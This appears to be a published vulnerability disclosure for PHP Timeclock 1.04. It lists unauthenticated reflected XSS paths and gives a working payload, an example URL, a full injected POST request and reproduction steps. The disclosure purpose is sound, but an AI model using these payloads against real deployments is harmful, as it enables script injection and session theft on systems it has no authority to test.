PHP Timeclock 1.04 - 'Multiple' Cross Site Scripting (XSS)

# Exploit Title: PHP Timeclock 1.04 - 'Multiple' Cross Site Scripting (XSS)
# Date: May 3rd 2021
# Exploit Author: Tyler Butler
# Vendor Homepage: http://timeclock.sourceforge.net
# Software Link: https://sourceforge.net/projects/timeclock/files/PHP%20Timeclock/PHP%20Timeclock%201.04/
# Version: 1.04
# Tested on: PHP 4.4.9/5.3.3 Apache 2.2 MySql 4.1.22/5

Description: PHP Timeclock version 1.04 (and prior) suffers from multiple Cross-Site Scripting vulnerabilities

#1: Unauthenticated Reflected XSS: Arbitrary javascript can be injected into the application by appending a termination /'> and payload directly to the end of the GET request URL. The vulnerable paths include (1) /login.php  (2) /timeclock.php (3) /reports/audit.php and (4) /reports/timerpt.php. 


Payload: /'><svg/onload=alert`xss`>

Example: http://target/login.php/'%3E%3Csvg/onload=alert%60xss%60%3E
ß

Steps to reproduce:
  1. Navigate to a site that uses PHP Timeclock 1.04 or earlier
  2. Make a GET request to one of the four resources mentioned above
  3. Append /'> and the payload to the end of the request
  4. Submit the request and observe payload execution


#2: Unauthenticated Reflected XSS: Arbitrary javascript can be injected into the application in POST requests to (1) /reports/audit.php (2) /reports/total_hours.php (3) /reports/timerpt.php via the from_date and to_date parameters.

# Example: 

POST /reports/audit.php HTTP/1.1
Host: localhost
Content-Length: 98
Cache-Control: max-age=0
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/reports/audit.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=62cfcffbd929595ba31915b4d8f01d7d; remember_me=foo
Connection: close

date_format=M%2Fd%2Fyyyy&from_date=5%2F2%2F2021'><svg/onload=alert`xss`>&to_date=5%2F18%2F2021&csv=0&submit.x=40&submit.y=5


Payload: '><svg/onload=alert`xss`>


Steps to reproduce:
  1. Navigate to a site that uses PHP Timeclock 1.04 or earlier
  2. Create a report at one of the vulnerable directories noted above
  3. Intercept the request with a proxy tool like BurpSuite
  4. Inject payload into the from_date or to_date fields